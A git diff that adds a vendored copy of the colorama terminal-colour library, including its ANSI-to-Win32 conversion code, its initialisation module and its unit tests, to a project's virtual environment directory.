need_conversion or not have_tty + self.strip = strip + + # should we should convert ANSI sequences into win32 calls? + if convert is None: + convert = need_conversion and have_tty + self.convert = convert + + # dict of ansi codes to win32 functions and parameters + self.win32_calls = self.get_win32_calls() + + # are we wrapping stderr? + self.on_stderr = self.wrapped is sys.stderr + + def should_wrap(self): + ''' + True if this class is actually needed. If false, then the output + stream will not be affected, nor will win32 calls be issued, so + wrapping stdout is not actually required. This will generally be + False on non-Windows platforms, unless optional functionality like + autoreset has been requested using kwargs to init() + ''' + return self.convert or self.strip or self.autoreset + + def get_win32_calls(self): + if self.convert and winterm: + return { + AnsiStyle.RESET_ALL: (winterm.reset_all, ), + AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT), + AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL), + AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL), + AnsiFore.BLACK: (winterm.fore, WinColor.BLACK), + AnsiFore.RED: (winterm.fore, WinColor.RED), + AnsiFore.GREEN: (winterm.fore, WinColor.GREEN), + AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW), + AnsiFore.BLUE: (winterm.fore, WinColor.BLUE), + AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA), + AnsiFore.CYAN: (winterm.fore, WinColor.CYAN), + AnsiFore.WHITE: (winterm.fore, WinColor.GREY), + AnsiFore.RESET: (winterm.fore, ), + AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True), + AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True), + AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True), + AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True), + AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True), + AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True), + AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True), + AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True), + AnsiBack.BLACK: (winterm.back, WinColor.BLACK), + AnsiBack.RED: (winterm.back, WinColor.RED), + AnsiBack.GREEN: (winterm.back, WinColor.GREEN), + AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW), + AnsiBack.BLUE: (winterm.back, WinColor.BLUE), + AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA), + AnsiBack.CYAN: (winterm.back, WinColor.CYAN), + AnsiBack.WHITE: (winterm.back, WinColor.GREY), + AnsiBack.RESET: (winterm.back, ), + AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True), + AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True), + AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True), + AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True), + AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True), + AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True), + AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True), + AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True), + } + return dict() + + def write(self, text): + if self.strip or self.convert: + self.write_and_convert(text) + else: + self.wrapped.write(text) + self.wrapped.flush() + if self.autoreset: + self.reset_all() + + + def reset_all(self): + if self.convert: + self.call_win32('m', (0,)) + elif not self.strip and not self.stream.closed: + self.wrapped.write(Style.RESET_ALL) + + + def write_and_convert(self, text): + ''' + Write the given text to our wrapped stream, stripping any ANSI + sequences from the text, and optionally converting them into win32 + calls. + ''' + cursor = 0 + text = self.convert_osc(text) + for match in self.ANSI_CSI_RE.finditer(text): + start, end = match.span() + self.write_plain_text(text, cursor, start) + self.convert_ansi(*match.groups()) + cursor = end + self.write_plain_text(text, cursor, len(text)) + + + def write_plain_text(self, text, start, end): + if start < end: + self.wrapped.write(text[start:end]) + self.wrapped.flush() + + + def convert_ansi(self, paramstring, command): + if self.convert: + params = self.extract_params(command, paramstring) + self.call_win32(command, params) + + + def extract_params(self, command, paramstring): + if command in 'Hf': + params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';')) + while len(params) < 2: + # defaults: + params = params + (1,) + else: + params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0) + if len(params) == 0: + # defaults: + if command in 'JKm': + params = (0,) + elif command in 'ABCD': + params = (1,) + + return params + + + def call_win32(self, command, params): + if command == 'm': + for param in params: + if param in self.win32_calls: + func_args = self.win32_calls[param] + func = func_args[0] + args = func_args[1:] + kwargs = dict(on_stderr=self.on_stderr) + func(*args, **kwargs) + elif command in 'J': + winterm.erase_screen(params[0], on_stderr=self.on_stderr) + elif command in 'K': + winterm.erase_line(params[0], on_stderr=self.on_stderr) + elif command in 'Hf': # cursor position - absolute + winterm.set_cursor_position(params, on_stderr=self.on_stderr) + elif command in 'ABCD': # cursor position - relative + n = params[0] + # A - up, B - down, C - forward, D - back + x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command] + winterm.cursor_adjust(x, y, on_stderr=self.on_stderr) + + + def convert_osc(self, text): + for match in self.ANSI_OSC_RE.finditer(text): + start, end = match.span() + text = text[:start] + text[end:] + paramstring, command = match.groups() + if command == BEL: + if paramstring.count(";") == 1: + params = paramstring.split(";") + # 0 - change title and icon (we will only change title) + # 1 - change icon (we don't support this) + # 2 - change title + if params[0] in '02': + winterm.set_title(params[1]) + return text + + + def flush(self): + self.wrapped.flush() diff --git a/env/Lib/site-packages/colorama/initialise.py b/env/Lib/site-packages/colorama/initialise.py new file mode 100644 index 00000000..d5fd4b71 --- /dev/null +++ b/env/Lib/site-packages/colorama/initialise.py @@ -0,0 +1,121 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import atexit +import contextlib +import sys + +from .ansitowin32 import AnsiToWin32 + + +def _wipe_internal_state_for_tests(): + global orig_stdout, orig_stderr + orig_stdout = None + orig_stderr = None + + global wrapped_stdout, wrapped_stderr + wrapped_stdout = None + wrapped_stderr = None + + global atexit_done + atexit_done = False + + global fixed_windows_console + fixed_windows_console = False + + try: + # no-op if it wasn't registered + atexit.unregister(reset_all) + except AttributeError: + # python 2: no atexit.unregister. Oh well, we did our best. + pass + + +def reset_all(): + if AnsiToWin32 is not None: # Issue #74: objects might become None at exit + AnsiToWin32(orig_stdout).reset_all() + + +def init(autoreset=False, convert=None, strip=None, wrap=True): + + if not wrap and any([autoreset, convert, strip]): + raise ValueError('wrap=False conflicts with any other arg=True') + + global wrapped_stdout, wrapped_stderr + global orig_stdout, orig_stderr + + orig_stdout = sys.stdout + orig_stderr = sys.stderr + + if sys.stdout is None: + wrapped_stdout = None + else: + sys.stdout = wrapped_stdout = \ + wrap_stream(orig_stdout, convert, strip, autoreset, wrap) + if sys.stderr is None: + wrapped_stderr = None + else: + sys.stderr = wrapped_stderr = \ + wrap_stream(orig_stderr, convert, strip, autoreset, wrap) + + global atexit_done + if not atexit_done: + atexit.register(reset_all) + atexit_done = True + + +def deinit(): + if orig_stdout is not None: + sys.stdout = orig_stdout + if orig_stderr is not None: + sys.stderr = orig_stderr + + +def just_fix_windows_console(): + global fixed_windows_console + + if sys.platform != "win32": + return + if fixed_windows_console: + return + if wrapped_stdout is not None or wrapped_stderr is not None: + # Someone already ran init() and it did stuff, so we won't second-guess them + return + + # On newer versions of Windows, AnsiToWin32.__init__ will implicitly enable the + # native ANSI support in the console as a side-effect. We only need to actually + # replace sys.stdout/stderr if we're in the old-style conversion mode. + new_stdout = AnsiToWin32(sys.stdout, convert=None, strip=None, autoreset=False) + if new_stdout.convert: + sys.stdout = new_stdout + new_stderr = AnsiToWin32(sys.stderr, convert=None, strip=None, autoreset=False) + if new_stderr.convert: + sys.stderr = new_stderr + + fixed_windows_console = True + +@contextlib.contextmanager +def colorama_text(*args, **kwargs): + init(*args, **kwargs) + try: + yield + finally: + deinit() + + +def reinit(): + if wrapped_stdout is not None: + sys.stdout = wrapped_stdout + if wrapped_stderr is not None: + sys.stderr = wrapped_stderr + + +def wrap_stream(stream, convert, strip, autoreset, wrap): + if wrap: + wrapper = AnsiToWin32(stream, + convert=convert, strip=strip, autoreset=autoreset) + if wrapper.should_wrap(): + stream = wrapper.stream + return stream + + +# Use this for initial setup as well, to reduce code duplication +_wipe_internal_state_for_tests() diff --git a/env/Lib/site-packages/colorama/tests/__init__.py b/env/Lib/site-packages/colorama/tests/__init__.py new file mode 100644 index 00000000..8c5661e9 --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/__init__.py @@ -0,0 +1 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. diff --git a/env/Lib/site-packages/colorama/tests/ansi_test.py b/env/Lib/site-packages/colorama/tests/ansi_test.py new file mode 100644 index 00000000..0a20c80f --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/ansi_test.py @@ -0,0 +1,76 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main + +from ..ansi import Back, Fore, Style +from ..ansitowin32 import AnsiToWin32 + +stdout_orig = sys.stdout +stderr_orig = sys.stderr + + +class AnsiTest(TestCase): + + def setUp(self): + # sanity check: stdout should be a file or StringIO object. + # It will only be AnsiToWin32 if init() has previously wrapped it + self.assertNotEqual(type(sys.stdout), AnsiToWin32) + self.assertNotEqual(type(sys.stderr), AnsiToWin32) + + def tearDown(self): + sys.stdout = stdout_orig + sys.stderr = stderr_orig + + + def testForeAttributes(self): + self.assertEqual(Fore.BLACK, '\033[30m') + self.assertEqual(Fore.RED, '\033[31m') + self.assertEqual(Fore.GREEN, '\033[32m') + self.assertEqual(Fore.YELLOW, '\033[33m') + self.assertEqual(Fore.BLUE, '\033[34m') + self.assertEqual(Fore.MAGENTA, '\033[35m') + self.assertEqual(Fore.CYAN, '\033[36m') + self.assertEqual(Fore.WHITE, '\033[37m') + self.assertEqual(Fore.RESET, '\033[39m') + + # Check the light, extended versions. + self.assertEqual(Fore.LIGHTBLACK_EX, '\033[90m') + self.assertEqual(Fore.LIGHTRED_EX, '\033[91m') + self.assertEqual(Fore.LIGHTGREEN_EX, '\033[92m') + self.assertEqual(Fore.LIGHTYELLOW_EX, '\033[93m') + self.assertEqual(Fore.LIGHTBLUE_EX, '\033[94m') + self.assertEqual(Fore.LIGHTMAGENTA_EX, '\033[95m') + self.assertEqual(Fore.LIGHTCYAN_EX, '\033[96m') + self.assertEqual(Fore.LIGHTWHITE_EX, '\033[97m') + + + def testBackAttributes(self): + self.assertEqual(Back.BLACK, '\033[40m') + self.assertEqual(Back.RED, '\033[41m') + self.assertEqual(Back.GREEN, '\033[42m') + self.assertEqual(Back.YELLOW, '\033[43m') + self.assertEqual(Back.BLUE, '\033[44m') + self.assertEqual(Back.MAGENTA, '\033[45m') + self.assertEqual(Back.CYAN, '\033[46m') + self.assertEqual(Back.WHITE, '\033[47m') + self.assertEqual(Back.RESET, '\033[49m') + + # Check the light, extended versions. + self.assertEqual(Back.LIGHTBLACK_EX, '\033[100m') + self.assertEqual(Back.LIGHTRED_EX, '\033[101m') + self.assertEqual(Back.LIGHTGREEN_EX, '\033[102m') + self.assertEqual(Back.LIGHTYELLOW_EX, '\033[103m') + self.assertEqual(Back.LIGHTBLUE_EX, '\033[104m') + self.assertEqual(Back.LIGHTMAGENTA_EX, '\033[105m') + self.assertEqual(Back.LIGHTCYAN_EX, '\033[106m') + self.assertEqual(Back.LIGHTWHITE_EX, '\033[107m') + + + def testStyleAttributes(self): + self.assertEqual(Style.DIM, '\033[2m') + self.assertEqual(Style.NORMAL, '\033[22m') + self.assertEqual(Style.BRIGHT, '\033[1m') + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/tests/ansitowin32_test.py b/env/Lib/site-packages/colorama/tests/ansitowin32_test.py new file mode 100644 index 00000000..91ca551f --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/ansitowin32_test.py @@ -0,0 +1,294 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from io import StringIO, TextIOWrapper +from unittest import TestCase, main +try: + from contextlib import ExitStack +except ImportError: + # python 2 + from contextlib2 import ExitStack + +try: + from unittest.mock import MagicMock, Mock, patch +except ImportError: + from mock import MagicMock, Mock, patch + +from ..ansitowin32 import AnsiToWin32, StreamWrapper +from ..win32 import ENABLE_VIRTUAL_TERMINAL_PROCESSING +from .utils import osname + + +class StreamWrapperTest(TestCase): + + def testIsAProxy(self): + mockStream = Mock() + wrapper = StreamWrapper(mockStream, None) + self.assertTrue( wrapper.random_attr is mockStream.random_attr ) + + def testDelegatesWrite(self): + mockStream = Mock() + mockConverter = Mock() + wrapper = StreamWrapper(mockStream, mockConverter) + wrapper.write('hello') + self.assertTrue(mockConverter.write.call_args, (('hello',), {})) + + def testDelegatesContext(self): + mockConverter = Mock() + s = StringIO() + with StreamWrapper(s, mockConverter) as fp: + fp.write(u'hello') + self.assertTrue(s.closed) + + def testProxyNoContextManager(self): + mockStream = MagicMock() + mockStream.__enter__.side_effect = AttributeError() + mockConverter = Mock() + with self.assertRaises(AttributeError) as excinfo: + with StreamWrapper(mockStream, mockConverter) as wrapper: + wrapper.write('hello') + + def test_closed_shouldnt_raise_on_closed_stream(self): + stream = StringIO() + stream.close() + wrapper = StreamWrapper(stream, None) + self.assertEqual(wrapper.closed, True) + + def test_closed_shouldnt_raise_on_detached_stream(self): + stream = TextIOWrapper(StringIO()) + stream.detach() + wrapper = StreamWrapper(stream, None) + self.assertEqual(wrapper.closed, True) + +class AnsiToWin32Test(TestCase): + + def testInit(self): + mockStdout = Mock() + auto = Mock() + stream = AnsiToWin32(mockStdout, autoreset=auto) + self.assertEqual(stream.wrapped, mockStdout) + self.assertEqual(stream.autoreset, auto) + + @patch('colorama.ansitowin32.winterm', None) + @patch('colorama.ansitowin32.winapi_test', lambda *_: True) + def testStripIsTrueOnWindows(self): + with osname('nt'): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + self.assertTrue(stream.strip) + + def testStripIsFalseOffWindows(self): + with osname('posix'): + mockStdout = Mock(closed=False) + stream = AnsiToWin32(mockStdout) + self.assertFalse(stream.strip) + + def testWriteStripsAnsi(self): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + stream.wrapped = Mock() + stream.write_and_convert = Mock() + stream.strip = True + + stream.write('abc') + + self.assertFalse(stream.wrapped.write.called) + self.assertEqual(stream.write_and_convert.call_args, (('abc',), {})) + + def testWriteDoesNotStripAnsi(self): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + stream.wrapped = Mock() + stream.write_and_convert = Mock() + stream.strip = False + stream.convert = False + + stream.write('abc') + + self.assertFalse(stream.write_and_convert.called) + self.assertEqual(stream.wrapped.write.call_args, (('abc',), {})) + + def assert_autoresets(self, convert, autoreset=True): + stream = AnsiToWin32(Mock()) + stream.convert = convert + stream.reset_all = Mock() + stream.autoreset = autoreset + stream.winterm = Mock() + + stream.write('abc') + + self.assertEqual(stream.reset_all.called, autoreset) + + def testWriteAutoresets(self): + self.assert_autoresets(convert=True) + self.assert_autoresets(convert=False) + self.assert_autoresets(convert=True, autoreset=False) + self.assert_autoresets(convert=False, autoreset=False) + + def testWriteAndConvertWritesPlainText(self): + stream = AnsiToWin32(Mock()) + stream.write_and_convert( 'abc' ) + self.assertEqual( stream.wrapped.write.call_args, (('abc',), {}) ) + + def testWriteAndConvertStripsAllValidAnsi(self): + stream = AnsiToWin32(Mock()) + stream.call_win32 = Mock() + data = [ + 'abc\033[mdef', + 'abc\033[0mdef', + 'abc\033[2mdef', + 'abc\033[02mdef', + 'abc\033[002mdef', + 'abc\033[40mdef', + 'abc\033[040mdef', + 'abc\033[0;1mdef', + 'abc\033[40;50mdef', + 'abc\033[50;30;40mdef', + 'abc\033[Adef', + 'abc\033[0Gdef', + 'abc\033[1;20;128Hdef', + ] + for datum in data: + stream.wrapped.write.reset_mock() + stream.write_and_convert( datum ) + self.assertEqual( + [args[0] for args in stream.wrapped.write.call_args_list], + [ ('abc',), ('def',) ] + ) + + def testWriteAndConvertSkipsEmptySnippets(self): + stream = AnsiToWin32(Mock()) + stream.call_win32 = Mock() + stream.write_and_convert( '\033[40m\033[41m' ) + self.assertFalse( stream.wrapped.write.called ) + + def testWriteAndConvertCallsWin32WithParamsAndCommand(self): + stream = AnsiToWin32(Mock()) + stream.convert = True + stream.call_win32 = Mock() + stream.extract_params = Mock(return_value='params') + data = { + 'abc\033[adef': ('a', 'params'), + 'abc\033[;;bdef': ('b', 'params'), + 'abc\033[0cdef': ('c', 'params'), + 'abc\033[;;0;;Gdef': ('G', 'params'), + 'abc\033[1;20;128Hdef': ('H', 'params'), + } + for datum, expected in data.items(): + stream.call_win32.reset_mock() + stream.write_and_convert( datum ) + self.assertEqual( stream.call_win32.call_args[0], expected ) + + def test_reset_all_shouldnt_raise_on_closed_orig_stdout(self): + stream = StringIO() + converter = AnsiToWin32(stream) + stream.close() + + converter.reset_all() + + def test_wrap_shouldnt_raise_on_closed_orig_stdout(self): + stream = StringIO() + stream.close() + with \ + patch("colorama.ansitowin32.os.name", "nt"), \ + patch("colorama.ansitowin32.winapi_test", lambda: True): + converter = AnsiToWin32(stream) + self.assertTrue(converter.strip) + self.assertFalse(converter.convert) + + def test_wrap_shouldnt_raise_on_missing_closed_attr(self): + with \ + patch("colorama.ansitowin32.os.name", "nt"), \ + patch("colorama.ansitowin32.winapi_test", lambda: True): + converter = AnsiToWin32(object()) + self.assertTrue(converter.strip) + self.assertFalse(converter.convert) + + def testExtractParams(self): + stream = AnsiToWin32(Mock()) + data = { + '': (0,), + ';;': (0,), + '2': (2,), + ';;002;;': (2,), + '0;1': (0, 1), + ';;003;;456;;': (3, 456), + '11;22;33;44;55': (11, 22, 33, 44, 55), + } + for datum, expected in data.items(): + self.assertEqual(stream.extract_params('m', datum), expected) + + def testCallWin32UsesLookup(self): + listener = Mock() + stream = AnsiToWin32(listener) + stream.win32_calls = { + 1: (lambda *_, **__: listener(11),), + 2: (lambda *_, **__: listener(22),), + 3: (lambda *_, **__: listener(33),), + } + stream.call_win32('m', (3, 1, 99, 2)) + self.assertEqual( + [a[0][0] for a in listener.call_args_list], + [33, 11, 22] ) + + def test_osc_codes(self): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout, convert=True) + with patch('colorama.ansitowin32.winterm') as winterm: + data = [ + '\033]0\x07', # missing arguments + '\033]0;foo\x08', # wrong OSC command + '\033]0;colorama_test_title\x07', # should work + '\033]1;colorama_test_title\x07', # wrong set command + '\033]2;colorama_test_title\x07', # should work + '\033]' + ';' * 64 + '\x08', # see issue #247 + ] + for code in data: + stream.write(code) + self.assertEqual(winterm.set_title.call_count, 2) + + def test_native_windows_ansi(self): + with ExitStack() as stack: + def p(a, b): + stack.enter_context(patch(a, b, create=True)) + # Pretend to be on Windows + p("colorama.ansitowin32.os.name", "nt") + p("colorama.ansitowin32.winapi_test", lambda: True) + p("colorama.win32.winapi_test", lambda: True) + p("colorama.winterm.win32.windll", "non-None") + p("colorama.winterm.get_osfhandle", lambda _: 1234) + + # Pretend that our mock stream has native ANSI support + p( + "colorama.winterm.win32.GetConsoleMode", + lambda _: ENABLE_VIRTUAL_TERMINAL_PROCESSING, + ) + SetConsoleMode = Mock() + p("colorama.winterm.win32.SetConsoleMode", SetConsoleMode) + + stdout = Mock() + stdout.closed = False + stdout.isatty.return_value = True + stdout.fileno.return_value = 1 + + # Our fake console says it has native vt support, so AnsiToWin32 should + # enable that support and do nothing else. + stream = AnsiToWin32(stdout) + SetConsoleMode.assert_called_with(1234, ENABLE_VIRTUAL_TERMINAL_PROCESSING) + self.assertFalse(stream.strip) + self.assertFalse(stream.convert) + self.assertFalse(stream.should_wrap()) + + # Now let's pretend we're on an old Windows console, that doesn't have + # native ANSI support. + p("colorama.winterm.win32.GetConsoleMode", lambda _: 0) + SetConsoleMode = Mock() + p("colorama.winterm.win32.SetConsoleMode", SetConsoleMode) + + stream = AnsiToWin32(stdout) + SetConsoleMode.assert_called_with(1234, ENABLE_VIRTUAL_TERMINAL_PROCESSING) + self.assertTrue(stream.strip) + self.assertTrue(stream.convert) + self.assertTrue(stream.should_wrap()) + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/tests/initialise_test.py b/env/Lib/site-packages/colorama/tests/initialise_test.py new file mode 100644 index 00000000..89f9b075 --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/initialise_test.py @@ -0,0 +1,189 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main, skipUnless + +try: + from unittest.mock import patch, Mock +except ImportError: + from mock import patch, Mock + +from ..ansitowin32 import StreamWrapper +from ..initialise import init, just_fix_windows_console, _wipe_internal_state_for_tests +from .utils import osname, replace_by + +orig_stdout = sys.stdout +orig_stderr = sys.stderr + + +class InitTest(TestCase): + + @skipUnless(sys.stdout.isatty(), "sys.stdout is not a tty") + def setUp(self): + # sanity check + self.assertNotWrapped() + + def tearDown(self): + _wipe_internal_state_for_tests() + sys.stdout = orig_stdout + sys.stderr = orig_stderr + + def assertWrapped(self): + self.assertIsNot(sys.stdout, orig_stdout, 'stdout should be wrapped') + self.assertIsNot(sys.stderr, orig_stderr, 'stderr should be wrapped') + self.assertTrue(isinstance(sys.stdout, StreamWrapper), + 'bad stdout wrapper') + self.assertTrue(isinstance(sys.stderr, StreamWrapper), + 'bad stderr wrapper') + + def assertNotWrapped(self): + self.assertIs(sys.stdout, orig_stdout, 'stdout should not be wrapped') + self.assertIs(sys.stderr, orig_stderr, 'stderr should not be wrapped') + + @patch('colorama.initialise.reset_all') + @patch('colorama.ansitowin32.winapi_test', lambda *_: True) + @patch('colorama.ansitowin32.enable_vt_processing', lambda *_: False) + def testInitWrapsOnWindows(self, _): + with osname("nt"): + init() + self.assertWrapped() + + @patch('colorama.initialise.reset_all') + @patch('colorama.ansitowin32.winapi_test', lambda *_: False) + def testInitDoesntWrapOnEmulatedWindows(self, _): + with osname("nt"): + init() + self.assertNotWrapped() + + def testInitDoesntWrapOnNonWindows(self): + with osname("posix"): + init() + self.assertNotWrapped() + + def testInitDoesntWrapIfNone(self): + with replace_by(None): + init() + # We can't use assertNotWrapped here because replace_by(None) + # changes stdout/stderr already. + self.assertIsNone(sys.stdout) + self.assertIsNone(sys.stderr) + + def testInitAutoresetOnWrapsOnAllPlatforms(self): + with osname("posix"): + init(autoreset=True) + self.assertWrapped() + + def testInitWrapOffDoesntWrapOnWindows(self): + with osname("nt"): + init(wrap=False) + self.assertNotWrapped() + + def testInitWrapOffIncompatibleWithAutoresetOn(self): + self.assertRaises(ValueError, lambda: init(autoreset=True, wrap=False)) + + @patch('colorama.win32.SetConsoleTextAttribute') + @patch('colorama.initialise.AnsiToWin32') + def testAutoResetPassedOn(self, mockATW32, _): + with osname("nt"): + init(autoreset=True) + self.assertEqual(len(mockATW32.call_args_list), 2) + self.assertEqual(mockATW32.call_args_list[1][1]['autoreset'], True) + self.assertEqual(mockATW32.call_args_list[0][1]['autoreset'], True) + + @patch('colorama.initialise.AnsiToWin32') + def testAutoResetChangeable(self, mockATW32): + with osname("nt"): + init() + + init(autoreset=True) + self.assertEqual(len(mockATW32.call_args_list), 4) + self.assertEqual(mockATW32.call_args_list[2][1]['autoreset'], True) + self.assertEqual(mockATW32.call_args_list[3][1]['autoreset'], True) + + init() + self.assertEqual(len(mockATW32.call_args_list), 6) + self.assertEqual( + mockATW32.call_args_list[4][1]['autoreset'], False) + self.assertEqual( + mockATW32.call_args_list[5][1]['autoreset'], False) + + + @patch('colorama.initialise.atexit.register') + def testAtexitRegisteredOnlyOnce(self, mockRegister): + init() + self.assertTrue(mockRegister.called) + mockRegister.reset_mock() + init() + self.assertFalse(mockRegister.called) + + +class JustFixWindowsConsoleTest(TestCase): + def _reset(self): + _wipe_internal_state_for_tests() + sys.stdout = orig_stdout + sys.stderr = orig_stderr + + def tearDown(self): + self._reset() + + @patch("colorama.ansitowin32.winapi_test", lambda: True) + def testJustFixWindowsConsole(self): + if sys.platform != "win32": + # just_fix_windows_console should be a no-op + just_fix_windows_console() + self.assertIs(sys.stdout, orig_stdout) + self.assertIs(sys.stderr, orig_stderr) + else: + def fake_std(): + # Emulate stdout=not a tty, stderr=tty + # to check that we handle both cases correctly + stdout = Mock() + stdout.closed = False + stdout.isatty.return_value = False + stdout.fileno.return_value = 1 + sys.stdout = stdout + + stderr = Mock() + stderr.closed = False + stderr.isatty.return_value = True + stderr.fileno.return_value = 2 + sys.stderr = stderr + + for native_ansi in [False, True]: + with patch( + 'colorama.ansitowin32.enable_vt_processing', + lambda *_: native_ansi + ): + self._reset() + fake_std() + + # Regular single-call test + prev_stdout = sys.stdout + prev_stderr = sys.stderr + just_fix_windows_console() + self.assertIs(sys.stdout, prev_stdout) + if native_ansi: + self.assertIs(sys.stderr, prev_stderr) + else: + self.assertIsNot(sys.stderr, prev_stderr) + + # second call without resetting is always a no-op + prev_stdout = sys.stdout + prev_stderr = sys.stderr + just_fix_windows_console() + self.assertIs(sys.stdout, prev_stdout) + self.assertIs(sys.stderr, prev_stderr) + + self._reset() + fake_std() + + # If init() runs first, just_fix_windows_console should be a no-op + init() + prev_stdout = sys.stdout + prev_stderr = sys.stderr + just_fix_windows_console() + self.assertIs(prev_stdout, sys.stdout) + self.assertIs(prev_stderr, sys.stderr) + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/tests/isatty_test.py b/env/Lib/site-packages/colorama/tests/isatty_test.py new file mode 100644 index 00000000..0f84e4be --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/isatty_test.py @@ -0,0 +1,57 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main + +from ..ansitowin32 import StreamWrapper, AnsiToWin32 +from .utils import pycharm, replace_by, replace_original_by, StreamTTY, StreamNonTTY + + +def is_a_tty(stream): + return StreamWrapper(stream, None).isatty() + +class IsattyTest(TestCase): + + def test_TTY(self): + tty = StreamTTY() + self.assertTrue(is_a_tty(tty)) + with pycharm(): + self.assertTrue(is_a_tty(tty)) + + def test_nonTTY(self): + non_tty = StreamNonTTY() + self.assertFalse(is_a_tty(non_tty)) + with pycharm(): + self.assertFalse(is_a_tty(non_tty)) + + def test_withPycharm(self): + with pycharm(): + self.assertTrue(is_a_tty(sys.stderr)) + self.assertTrue(is_a_tty(sys.stdout)) + + def test_withPycharmTTYOverride(self): + tty = StreamTTY() + with pycharm(), replace_by(tty): + self.assertTrue(is_a_tty(tty)) + + def test_withPycharmNonTTYOverride(self): + non_tty = StreamNonTTY() + with pycharm(), replace_by(non_tty): + self.assertFalse(is_a_tty(non_tty)) + + def test_withPycharmNoneOverride(self): + with pycharm(): + with replace_by(None), replace_original_by(None): + self.assertFalse(is_a_tty(None)) + self.assertFalse(is_a_tty(StreamNonTTY())) + self.assertTrue(is_a_tty(StreamTTY())) + + def test_withPycharmStreamWrapped(self): + with pycharm(): + self.assertTrue(AnsiToWin32(StreamTTY()).stream.isatty()) + self.assertFalse(AnsiToWin32(StreamNonTTY()).stream.isatty()) + self.assertTrue(AnsiToWin32(sys.stdout).stream.isatty()) + self.assertTrue(AnsiToWin32(sys.stderr).stream.isatty()) + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/tests/utils.py b/env/Lib/site-packages/colorama/tests/utils.py new file mode 100644 index 00000000..472fafb4 --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/utils.py @@ -0,0 +1,49 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from contextlib import contextmanager +from io import StringIO +import sys +import os + + +class StreamTTY(StringIO): + def isatty(self): + return True + +class StreamNonTTY(StringIO): + def isatty(self): + return False + +@contextmanager +def osname(name): + orig = os.name + os.name = name + yield + os.name = orig + +@contextmanager +def replace_by(stream): + orig_stdout = sys.stdout + orig_stderr = sys.stderr + sys.stdout = stream + sys.stderr = stream + yield + sys.stdout = orig_stdout + sys.stderr = orig_stderr + +@contextmanager +def replace_original_by(stream): + orig_stdout = sys.__stdout__ + orig_stderr = sys.__stderr__ + sys.__stdout__ = stream + sys.__stderr__ = stream + yield + sys.__stdout__ = orig_stdout + sys.__stderr__ = orig_stderr + +@contextmanager +def pycharm(): + os.environ["PYCHARM_HOSTED"] = "1" + non_tty = StreamNonTTY() + with replace_by(non_tty), replace_original_by(non_tty): + yield + del os.environ["PYCHARM_HOSTED"] diff --git a/env/Lib/site-packages/colorama/tests/winterm_test.py b/env/Lib/site-packages/colorama/tests/winterm_test.py new file mode 100644 index 00000000..d0955f9e --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/winterm_test.py @@ -0,0 +1,131 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main, skipUnless + +try: + from unittest.mock import Mock, patch +except ImportError: + from mock import Mock, patch + +from ..winterm import WinColor, WinStyle, WinTerm + + +class WinTermTest(TestCase): + + @patch('colorama.winterm.win32') + def testInit(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 7 + 6 * 16 + 8 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + self.assertEqual(term._fore, 7) + self.assertEqual(term._back, 6) + self.assertEqual(term._style, 8) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testGetAttrs(self): + term = WinTerm() + + term._fore = 0 + term._back = 0 + term._style = 0 + self.assertEqual(term.get_attrs(), 0) + + term._fore = WinColor.YELLOW + 